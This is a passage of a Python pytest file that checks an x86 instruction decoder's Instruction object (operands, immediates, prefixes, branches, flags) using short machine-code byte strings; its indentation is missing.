decodera.ip = 0x1234_5678_9ABC_DEF1
decoderb.ip = 0xABCD_EF01_1234_5678
instr1 = decodera.decode()
instr2 = decodera.decode()
instr3 = decoderb.decode()
assert instr1 == instr1
assert not (instr1 != instr1)
assert instr1 != instr2
assert not (instr1 == instr2)
assert instr1 == instr3
assert not (instr1 != instr3)
assert hash(instr1) == hash(instr3)
assert instr1 != 1
assert instr1 != 1.23
assert instr1 != None
assert instr1 != []
assert instr1 != {}
assert instr1 != (1, 2)
assert not (instr1 == 1)
assert not (instr1 == 1.23)
assert not (instr1 == None)
assert not (instr1 == [])
assert not (instr1 == {})
assert not (instr1 == (1, 2))
def test_invalid():
instr = Instruction()
assert not instr
assert instr.is_invalid
instr.code = Code.ADD_AL_IMM8
assert instr
assert not instr.is_invalid
@pytest.mark.parametrize("copy_instr", [
lambda instr: copy.copy(instr),
lambda instr: copy.deepcopy(instr),
lambda instr: instr.copy(),
])
def test_copy_deepcopy_mcopy(copy_instr):
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
instr2 = copy_instr(instr)
assert instr is not instr2
assert id(instr) != id(instr2)
assert instr == instr2
assert not (instr != instr2)
assert instr.eq_all_bits(instr2)
assert instr2.eq_all_bits(instr)
assert hash(instr) == hash(instr2)
instr2.ip += 1
assert instr == instr2
assert not (instr != instr2)
assert not instr.eq_all_bits(instr2)
assert not instr2.eq_all_bits(instr)
assert hash(instr) == hash(instr2)
def test_some_props1():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.len == 6
assert len(instr) == 6
assert instr.ip16 == 0xDEF1
assert instr.ip32 == 0x9ABC_DEF1
assert instr.ip == 0x1234_5678_9ABC_DEF1
assert instr.next_ip16 == 0xDEF7
assert instr.next_ip32 == 0x9ABC_DEF7
assert instr.next_ip == 0x1234_5678_9ABC_DEF7
instr.ip = 0x9ABC_DEF0_1234_5678
assert instr.ip16 == 0x5678
assert instr.ip32 == 0x1234_5678
assert instr.ip == 0x9ABC_DEF0_1234_5678
assert instr.next_ip16 == 0x567E
assert instr.next_ip32 == 0x1234_567E
assert instr.next_ip == 0x9ABC_DEF0_1234_567E
instr.ip = 0x9ABC_DEF0_1234_5678
instr.ip32 = 0xABCD_EF01
assert instr.ip16 == 0xEF01
assert instr.ip32 == 0xABCD_EF01
assert instr.ip == 0xABCD_EF01
assert instr.next_ip16 == 0xEF07
assert instr.next_ip32 == 0xABCD_EF07
assert instr.next_ip == 0xABCD_EF07
instr.ip = 0x9ABC_DEF0_1234_5678
instr.ip16 = 0xABCD
assert instr.ip16 == 0xABCD
assert instr.ip32 == 0xABCD
assert instr.ip == 0xABCD
assert instr.next_ip16 == 0xABD3
assert instr.next_ip32 == 0xABD3
assert instr.next_ip == 0xABD3
instr.next_ip = 0x9ABC_DEF0_1234_5678
assert instr.ip16 == 0x5672
assert instr.ip32 == 0x1234_5672
assert instr.ip == 0x9ABC_DEF0_1234_5672
assert instr.next_ip16 == 0x5678
assert instr.next_ip32 == 0x1234_5678
assert instr.next_ip == 0x9ABC_DEF0_1234_5678
instr.next_ip = 0x9ABC_DEF0_1234_5678
instr.next_ip32 = 0xABCD_EF01
assert instr.ip16 == 0xEEFB
assert instr.ip32 == 0xABCD_EEFB
assert instr.ip == 0xABCD_EEFB
assert instr.next_ip16 == 0xEF01
assert instr.next_ip32 == 0xABCD_EF01
assert instr.next_ip == 0xABCD_EF01
instr.next_ip = 0x9ABC_DEF0_1234_5678
instr.next_ip16 = 0xABCD
assert instr.ip16 == 0xABC7
assert instr.ip32 == 0xABC7
assert instr.ip == 0xABC7
assert instr.next_ip16 == 0xABCD
assert instr.next_ip32 == 0xABCD
assert instr.next_ip == 0xABCD
assert instr.code == Code.VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4
assert instr.mnemonic == Mnemonic.VPERMIL2PS
assert instr.op_count == 5
instr.code = Code.ADD_AL_IMM8
assert instr.code == Code.ADD_AL_IMM8
assert instr.mnemonic == Mnemonic.ADD
assert instr.op_count == 2
assert instr.len == 6
assert len(instr) == 6
instr.len = 1
assert instr.len == 1
assert len(instr) == 1
def test_some_props2():
decoder = Decoder(64, b"\x00\xCE")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert not instr.has_xacquire_prefix
instr.has_xacquire_prefix = True
assert instr.has_xacquire_prefix
assert not instr.has_xrelease_prefix
instr.has_xrelease_prefix = True
assert instr.has_xrelease_prefix
assert not instr.has_rep_prefix
assert not instr.has_repe_prefix
instr.has_rep_prefix = True
assert instr.has_rep_prefix
assert instr.has_repe_prefix
instr.has_repe_prefix = False
assert not instr.has_rep_prefix
assert not instr.has_repe_prefix
assert not instr.has_repne_prefix
instr.has_repne_prefix = True
assert instr.has_repne_prefix
assert not instr.has_lock_prefix
instr.has_lock_prefix = True
assert instr.has_lock_prefix
assert instr.op_mask == Register.NONE
assert not instr.has_op_mask
instr.op_mask = Register.K2
assert instr.op_mask == Register.K2
assert instr.has_op_mask
assert not instr.zeroing_masking
assert instr.merging_masking
instr.zeroing_masking = True
assert instr.zeroing_masking
assert not instr.merging_masking
instr.merging_masking = True
assert not instr.zeroing_masking
assert instr.merging_masking
assert instr.rounding_control == RoundingControl.NONE
instr.rounding_control = RoundingControl.ROUND_TO_NEAREST
assert instr.rounding_control == RoundingControl.ROUND_TO_NEAREST
assert not instr.suppress_all_exceptions
instr.suppress_all_exceptions = True
assert instr.suppress_all_exceptions
assert not instr.is_privileged
assert not instr.is_save_restore_instruction
@pytest.mark.parametrize("bitness, code_size, data", [
(16, CodeSize.CODE16, b"\x90"),
(32, CodeSize.CODE32, b"\x90"),
(64, CodeSize.CODE64, b"\x90"),
])
def test_code_size(bitness, code_size, data):
instr = Decoder(bitness, data).decode()
assert instr.code_size == code_size
for new_size in [CodeSize.UNKNOWN, CodeSize.CODE16, CodeSize.CODE32, CodeSize.CODE64]:
instr.code_size = new_size
assert instr.code_size == new_size
def test_op_kind():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.op0_kind == OpKind.REGISTER
assert instr.op1_kind == OpKind.REGISTER
assert instr.op2_kind == OpKind.MEMORY
assert instr.op3_kind == OpKind.REGISTER
assert instr.op4_kind == OpKind.IMMEDIATE8
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
instr.op0_kind = OpKind.FAR_BRANCH16
instr.op1_kind = OpKind.FAR_BRANCH32
instr.op2_kind = OpKind.IMMEDIATE16
instr.op3_kind = OpKind.IMMEDIATE32
assert instr.op0_kind == OpKind.FAR_BRANCH16
assert instr.op1_kind == OpKind.FAR_BRANCH32
assert instr.op2_kind == OpKind.IMMEDIATE16
assert instr.op3_kind == OpKind.IMMEDIATE32
with pytest.raises(ValueError):
instr.op4_kind = OpKind.IMMEDIATE64
instr.op4_kind = OpKind.IMMEDIATE8
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
instr.set_op_kind(0, OpKind.IMMEDIATE8)
instr.set_op_kind(1, OpKind.IMMEDIATE8TO16)
instr.set_op_kind(2, OpKind.IMMEDIATE8TO32)
instr.set_op_kind(3, OpKind.IMMEDIATE8TO64)
assert instr.op0_kind == OpKind.IMMEDIATE8
assert instr.op1_kind == OpKind.IMMEDIATE8TO16
assert instr.op2_kind == OpKind.IMMEDIATE8TO32
assert instr.op3_kind == OpKind.IMMEDIATE8TO64
with pytest.raises(ValueError):
instr.set_op_kind(4, OpKind.IMMEDIATE64)
instr.set_op_kind(4, OpKind.IMMEDIATE8)
assert instr.op0_kind == instr.op_kind(0)
assert instr.op1_kind == instr.op_kind(1)
assert instr.op2_kind == instr.op_kind(2)
assert instr.op3_kind == instr.op_kind(3)
assert instr.op4_kind == instr.op_kind(4)
def test_op_register():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\xD3\x40")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert instr.op0_kind == OpKind.REGISTER
assert instr.op1_kind == OpKind.REGISTER
assert instr.op2_kind == OpKind.REGISTER
assert instr.op3_kind == OpKind.REGISTER
assert instr.op4_kind == OpKind.IMMEDIATE8
assert instr.op0_register == Register.XMM2
assert instr.op1_register == Register.XMM6
assert instr.op2_register == Register.XMM3
assert instr.op3_register == Register.XMM4
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM2
assert instr.op_register(1) == Register.XMM6
assert instr.op_register(2) == Register.XMM3
assert instr.op_register(3) == Register.XMM4
assert instr.op_register(4) == Register.NONE
instr.op0_register = Register.XMM1
instr.op1_register = Register.XMM5
instr.op2_register = Register.XMM7
instr.op3_register = Register.XMM13
with pytest.raises(ValueError):
instr.op4_register = Register.XMM15
instr.op4_register = Register.NONE
assert instr.op0_register == Register.XMM1
assert instr.op1_register == Register.XMM5
assert instr.op2_register == Register.XMM7
assert instr.op3_register == Register.XMM13
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM1
assert instr.op_register(1) == Register.XMM5
assert instr.op_register(2) == Register.XMM7
assert instr.op_register(3) == Register.XMM13
assert instr.op_register(4) == Register.NONE
instr.set_op_register(0, Register.XMM0)
instr.set_op_register(1, Register.XMM8)
instr.set_op_register(2, Register.XMM10)
instr.set_op_register(3, Register.XMM11)
with pytest.raises(ValueError):
instr.set_op_register(4, Register.XMM14)
instr.set_op_register(4, Register.NONE)
assert instr.op0_register == Register.XMM0
assert instr.op1_register == Register.XMM8
assert instr.op2_register == Register.XMM10
assert instr.op3_register == Register.XMM11
assert instr.op4_register == Register.NONE
assert instr.op_register(0) == Register.XMM0
assert instr.op_register(1) == Register.XMM8
assert instr.op_register(2) == Register.XMM10
assert instr.op_register(3) == Register.XMM11
assert instr.op_register(4) == Register.NONE
def test_mem():
decoder = Decoder(64, b"\xC4\xE3\x49\x48\x10\x41")
decoder.ip = 0x1234_5678_9ABC_DEF1
instr = decoder.decode()
assert not instr.has_segment_prefix
assert instr.segment_prefix == Register.NONE
assert instr.memory_segment == Register.DS
instr.segment_prefix = Register.GS
assert instr.has_segment_prefix
assert instr.segment_prefix == Register.GS
assert instr.memory_segment == Register.GS
assert instr.memory_displ_size == 0
instr.memory_displ_size = 1
assert instr.memory_displ_size == 1
instr.memory_displ_size = 2
assert instr.memory_displ_size == 2
instr.memory_displ_size = 4
assert instr.memory_displ_size == 4
instr.memory_displ_size = 8
assert instr.memory_displ_size == 8
instr.memory_displ_size = 0
assert instr.memory_displ_size == 0
assert instr.memory_size == MemorySize.PACKED128_FLOAT32
assert not instr.is_broadcast
instr.is_broadcast = True
assert instr.is_broadcast
assert instr.memory_index_scale == 1
instr.memory_index_scale = 2
assert instr.memory_index_scale == 2
instr.memory_index_scale = 4
assert instr.memory_index_scale == 4
instr.memory_index_scale = 8
assert instr.memory_index_scale == 8
instr.memory_index_scale = 1
assert instr.memory_index_scale == 1
assert instr.memory_displacement == 0
instr.memory_displacement = 0xFEDC_BA98_7654_3210
assert instr.memory_displacement == 0xFEDC_BA98_7654_3210
instr.memory_displacement = 0x1234_5678_9ABC_DEF1
assert instr.memory_displacement == 0x1234_5678_9ABC_DEF1
assert instr.memory_base == Register.RAX
instr.memory_base = Register.R15D
assert instr.memory_base == Register.R15D
assert instr.memory_index == Register.NONE
instr.memory_index = Register.XMM13
assert instr.memory_index == Register.XMM13
def test_imm8():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8
instr.immediate8 = 0xFE
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8 == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u32(0, 0xFE)
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8 == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u64(0, 0xFE)
assert instr.immediate8 == 0xFE
assert instr.immediate(0) == 0xFE
def test_imm8_2nd():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8_2ND
instr.immediate8_2nd = 0xFE
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8_2nd == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u32(0, 0xFE)
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8_2nd == 0xEE
assert instr.immediate(0) == 0xEE
instr.set_immediate_u64(0, 0xFE)
assert instr.immediate8_2nd == 0xFE
assert instr.immediate(0) == 0xFE
def test_imm16():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE16
instr.immediate16 = 0xFEDC
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
instr.set_immediate_i32(0, -0x1234)
assert instr.immediate16 == 0xEDCC
assert instr.immediate(0) == 0xEDCC
instr.set_immediate_u32(0, 0xFEDC)
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
instr.set_immediate_i64(0, -0x1234)
assert instr.immediate16 == 0xEDCC
assert instr.immediate(0) == 0xEDCC
instr.set_immediate_u64(0, 0xFEDC)
assert instr.immediate16 == 0xFEDC
assert instr.immediate(0) == 0xFEDC
def test_imm32():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE32
instr.immediate32 = 0xFEDC_BA98
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate32 == 0xEDCB_A988
assert instr.immediate(0) == 0xEDCB_A988
instr.set_immediate_u32(0, 0xFEDC_BA98)
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i64(0, -0x1234_5678)
assert instr.immediate32 == 0xEDCB_A988
assert instr.immediate(0) == 0xEDCB_A988
instr.set_immediate_u64(0, 0xFEDC_BA98)
assert instr.immediate32 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
def test_imm64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE64
instr.immediate64 = 0xFEDC_BA98_7654_3219
assert instr.immediate64 == 0xFEDC_BA98_7654_3219
assert instr.immediate(0) == 0xFEDC_BA98_7654_3219
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate64 == 0xFFFF_FFFF_EDCB_A988
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u32(0, 0xFEDC_BA98)
assert instr.immediate64 == 0xFEDC_BA98
assert instr.immediate(0) == 0xFEDC_BA98
instr.set_immediate_i64(0, -0x1234_5678_9ABC_DEF1)
assert instr.immediate64 == 0xEDCB_A987_6543_210F
assert instr.immediate(0) == 0xEDCB_A987_6543_210F
instr.set_immediate_u64(0, 0xFEDC_BA98_7654_3219)
assert instr.immediate64 == 0xFEDC_BA98_7654_3219
assert instr.immediate(0) == 0xFEDC_BA98_7654_3219
def test_imm8to16():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO16
instr.immediate8to16 = -0x12
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to16 = 0x12
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to16 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to16 == 0x12
assert instr.immediate(0) == 0x12
def test_imm8to32():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO32
instr.immediate8to32 = -0x12
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to32 = 0x12
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to32 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to32 == 0x12
assert instr.immediate(0) == 0x12
def test_imm8to64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE8TO64
instr.immediate8to64 = -0x12
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.immediate8to64 = 0x12
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i32(0, -0x12)
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u32(0, 0x12)
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
instr.set_immediate_i64(0, -0x12)
assert instr.immediate8to64 == -0x12
assert instr.immediate(0) == 0xFFFF_FFFF_FFFF_FFEE
instr.set_immediate_u64(0, 0x12)
assert instr.immediate8to64 == 0x12
assert instr.immediate(0) == 0x12
def test_imm32to64():
instr = Instruction()
instr.op0_kind = OpKind.IMMEDIATE32TO64
instr.immediate32to64 = -0x1234_5678
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.immediate32to64 = 0x1234_5678
assert instr.immediate32to64 == 0x1234_5678
assert instr.immediate(0) == 0x1234_5678
instr.set_immediate_i32(0, -0x1234_5678)
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u32(0, 0x1234_5678)
assert instr.immediate32to64 == 0x1234_5678
assert instr.immediate(0) == 0x1234_5678
instr.set_immediate_i64(0, -0x1234_5678)
assert instr.immediate32to64 == -0x1234_5678
assert instr.immediate(0) == 0xFFFF_FFFF_EDCB_A988
instr.set_immediate_u64(0, 0x1234_5678)
assert instr.immediate32to64 == 0x1234_5678
assert instr.immediate(0) == 0x1234_5678
def test_near_br16():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH16
instr.near_branch16 = 0xFEDC
assert instr.near_branch16 == 0xFEDC
assert instr.near_branch_target == 0xFEDC
instr.near_branch16 = 0x1234
assert instr.near_branch16 == 0x1234
assert instr.near_branch_target == 0x1234
def test_near_br32():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH32
instr.near_branch32 = 0xFEDC_BA98
assert instr.near_branch32 == 0xFEDC_BA98
assert instr.near_branch_target == 0xFEDC_BA98
instr.near_branch32 = 0x1234_5678
assert instr.near_branch32 == 0x1234_5678
assert instr.near_branch_target == 0x1234_5678
def test_near_br64():
instr = Instruction()
instr.op0_kind = OpKind.NEAR_BRANCH64
instr.near_branch64 = 0xFEDC_BA98_7654_321F
assert instr.near_branch64 == 0xFEDC_BA98_7654_321F
assert instr.near_branch_target == 0xFEDC_BA98_7654_321F
instr.near_branch64 = 0x1234_5678_9ABC_DEF1
assert instr.near_branch64 == 0x1234_5678_9ABC_DEF1
assert instr.near_branch_target == 0x1234_5678_9ABC_DEF1
def test_far_br16():
instr = Instruction()
instr.op0_kind = OpKind.FAR_BRANCH16
instr.far_branch16 = 0x1234
instr.far_branch_selector = 0xABCD
assert instr.far_branch16 == 0x1234
assert instr.far_branch_selector == 0xABCD
instr.far_branch16 = 0xABCD
instr.far_branch_selector = 0x1234
assert instr.far_branch16 == 0xABCD
assert instr.far_branch_selector == 0x1234
def test_far_br32():
instr = Instruction()
instr.op0_kind = OpKind.FAR_BRANCH32
instr.far_branch32 = 0x1234_5678
instr.far_branch_selector = 0xABCD
assert instr.far_branch32 == 0x1234_5678
assert instr.far_branch_selector == 0xABCD
instr.far_branch32 = 0xABCD_EF01
instr.far_branch_selector = 0x1234
assert instr.far_branch32 == 0xABCD_EF01
assert instr.far_branch_selector == 0x1234
@pytest.mark.parametrize("data", [
[0x12],
[0x12, 0x34],
[0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88],
])
def test_db_u(data):
assert 1 <= len(data) <= 16
instr = Instruction()
instr.code = Code.DECLAREBYTE
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_byte_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_byte_value(i) == d
@pytest.mark.parametrize("data", [
[0x12],
[0x12, 0x34],
[0x12, 0x34, 0x56, 0x78, -0x12, -0x34, -0x56, -0x78, 0x11, 0x22, 0x33, 0x44, -0x11, -0x22, -0x33, -0x44],
])
def test_db_i(data):
assert 1 <= len(data) <= 16
instr = Instruction()
instr.code = Code.DECLAREBYTE
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_byte_value_i8(i, d)
for i, d in enumerate(data):
assert instr.get_declare_byte_value_i8(i) == d
@pytest.mark.parametrize("data", [
[0x1234],
[0x1234, 0x89AB],
[0x1234, 0x89AB, 0x4567, 0xCDEF, 0x1122, 0x8899, 0x3344, 0xAABB],
])
def test_dw_u(data):
assert 1 <= len(data) <= 8
instr = Instruction()
instr.code = Code.DECLAREWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_word_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_word_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234],
[0x1234, -0x1234],
[0x1234, -0x1234, 0x4567, -0x4567, 0x1122, -0x1122, 0x3344, -0x3344],
])
def test_dw_i(data):
assert 1 <= len(data) <= 8
instr = Instruction()
instr.code = Code.DECLAREWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_word_value_i16(i, d)
for i, d in enumerate(data):
assert instr.get_declare_word_value_i16(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678],
[0x1234_5678, 0x89AB_CDEF],
[0x1234_5678, 0x9ABC_CDEF, 0x1122_3344, 0x8899_AABB],
])
def test_dd_u(data):
assert 1 <= len(data) <= 4
instr = Instruction()
instr.code = Code.DECLAREDWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_dword_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_dword_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678],
[0x1234_5678, -0x1234_5678],
[0x1234_5678, -0x1234_5678, 0x1122_3344, -0x1122_3344],
])
def test_dd_i(data):
assert 1 <= len(data) <= 4
instr = Instruction()
instr.code = Code.DECLAREDWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_dword_value_i32(i, d)
for i, d in enumerate(data):
assert instr.get_declare_dword_value_i32(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678_9ABC_DEF0],
[0x1234_5678_9ABC_DEF0, 0xABCD_EF01_2345_6789],
])
def test_dq_u(data):
assert 1 <= len(data) <= 2
instr = Instruction()
instr.code = Code.DECLAREQWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_qword_value(i, d)
for i, d in enumerate(data):
assert instr.get_declare_qword_value(i) == d
@pytest.mark.parametrize("data", [
[0x1234_5678_9ABC_DEF0],
[0x1234_5678_9ABC_DEF0, -0x1234_5678_9ABC_DEF0],
])
def test_dq_i(data):
assert 1 <= len(data) <= 2
instr = Instruction()
instr.code = Code.DECLAREQWORD
instr.declare_data_len = len(data)
assert instr.declare_data_len == len(data)
for i, d in enumerate(data):
instr.set_declare_qword_value_i64(i, d)
for i, d in enumerate(data):
assert instr.get_declare_qword_value_i64(i) == d
@pytest.mark.parametrize("bitness, data, vsib", [
(64, b"\x29\x18", 0),
(64, b"\xC4\xE2\x49\x90\x54\xA1\x01", 32),
(64, b"\xC4\xE2\x49\x91\x54\xA1\x01", 64),
])
def test_vsib(bitness, data, vsib):
instr = Decoder(bitness, data).decode()
if vsib == 0:
assert instr.vsib is None
assert not instr.is_vsib
assert not instr.is_vsib32
assert not instr.is_vsib64
elif vsib == 32:
assert instr.vsib is False
assert instr.is_vsib
assert instr.is_vsib32
assert not instr.is_vsib64
elif vsib == 64:
assert instr.vsib is True
assert instr.is_vsib
assert not instr.is_vsib32
assert instr.is_vsib64
else:
raise ValueError(f"Invalid vsib value: {vsib}")
def test_ip_rel_addr():
decoder = Decoder(64, b"\x00\x00" b"\x01\x35\x34\x12\x5A\xA5" b"\x67\x01\x35\x34\x12\x5A\xA5")
decoder.ip = 0x1234_5678_9ABC_DEF0
instr = decoder.decode()
assert not instr.is_ip_rel_memory_operand
instr = decoder.decode()
assert instr.is_ip_rel_memory_operand
assert instr.ip_rel_memory_address == 0x1234_5678_4016_F12C
instr = decoder.decode()
assert instr.is_ip_rel_memory_operand
assert instr.ip_rel_memory_address == 0x4016_F133
def test_sp_inc():
decoder = Decoder(64, b"\x90\x56\x5E")
instr = decoder.decode()
assert not instr.is_stack_instruction
assert instr.stack_pointer_increment == 0
instr = decoder.decode()
assert instr.is_stack_instruction
assert instr.stack_pointer_increment == -8
instr = decoder.decode()
assert instr.is_stack_instruction
assert instr.stack_pointer_increment == 8
@pytest.mark.parametrize("bitness, data, encoding", [
(64, b"\x56", EncodingKind.LEGACY),
(64, b"\xC5\xF8\x10\x10", EncodingKind.VEX),
(64, b"\x62\xF1\x7C\x08\x10\x50\x01", EncodingKind.EVEX),
(64, b"\x8F\xE8\x48\x85\x10\x40", EncodingKind.XOP),
(64, b"\x0F\x0F\x88\x34\x12\x5A\xA5\x0C", EncodingKind.D3NOW),
])
def test_encoding(bitness, data, encoding):
instr = Decoder(bitness, data).decode()
assert instr.encoding == encoding
def test_cpuid_features():
instr = Decoder(64, b"\x62\xF1\x7C\x08\x10\x50\x01").decode()
cpuid_features = instr.cpuid_features()
assert type(cpuid_features) == list
assert len(cpuid_features) == 2
assert set(cpuid_features) == set([CpuidFeature.AVX512VL, CpuidFeature.AVX512F])
def test_cflow():
decoder = Decoder(64, b"\x90\xCC\x70\x00")
assert decoder.decode().flow_control == FlowControl.NEXT
assert decoder.decode().flow_control == FlowControl.INTERRUPT
assert decoder.decode().flow_control == FlowControl.CONDITIONAL_BRANCH
def test_rflags():
decoder = Decoder(64, b"\x33\xC0")
instr = decoder.decode()
assert instr.rflags_read == RflagsBits.NONE
assert instr.rflags_written == RflagsBits.NONE
assert instr.rflags_cleared == RflagsBits.OF | RflagsBits.SF | RflagsBits.CF
assert instr.rflags_set == RflagsBits.ZF | RflagsBits.PF
assert instr.rflags_undefined == RflagsBits.AF
assert instr.rflags_modified == RflagsBits.OF | RflagsBits.SF | RflagsBits.ZF | RflagsBits.AF | RflagsBits.CF | RflagsBits.PF
def test_br_checks():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.is_jcc_short_or_near
assert instr.is_jcc_short
assert not instr.is_jcc_near
instr = Decoder(64, b"\x0F\x80\x00\x00\x00\x00").decode()
assert instr.is_jcc_short_or_near
assert not instr.is_jcc_short
assert instr.is_jcc_near
instr = Decoder(64, b"\xEB\x00").decode()
assert instr.is_jmp_short_or_near
assert instr.is_jmp_short
assert not instr.is_jmp_near
instr = Decoder(64, b"\xE9\x00\x00\x00\x00").decode()
assert instr.is_jmp_short_or_near
assert not instr.is_jmp_short
assert instr.is_jmp_near
instr = Decoder(32, b"\xEA\x00\x00\x00\x00\x00\x00").decode()
assert instr.is_jmp_far
assert not instr.is_call_far
assert not instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(32, b"\x9A\x00\x00\x00\x00\x00\x00").decode()
assert not instr.is_jmp_far
assert instr.is_call_far
assert not instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(64, b"\x48\xFF\x28").decode()
assert not instr.is_jmp_far
assert not instr.is_call_far
assert instr.is_jmp_far_indirect
assert not instr.is_call_far_indirect
instr = Decoder(64, b"\x48\xFF\x18").decode()
assert not instr.is_jmp_far
assert not instr.is_call_far
assert not instr.is_jmp_far_indirect
assert instr.is_call_far_indirect
instr = Decoder(64, b"\xE8\x00\x00\x00\x00").decode()
assert instr.is_call_near
assert not instr.is_jmp_near_indirect
assert not instr.is_call_near_indirect
instr = Decoder(64, b"\xFF\x20").decode()
assert not instr.is_call_near
assert instr.is_jmp_near_indirect
assert not instr.is_call_near_indirect
instr = Decoder(64, b"\xFF\x10").decode()
assert not instr.is_call_near
assert not instr.is_jmp_near_indirect
assert instr.is_call_near_indirect
def test_condition_code():
instr = Decoder(64, b"\x70\x00").decode()
assert instr.condition_code == ConditionCode.O
instr.negate_condition_code()
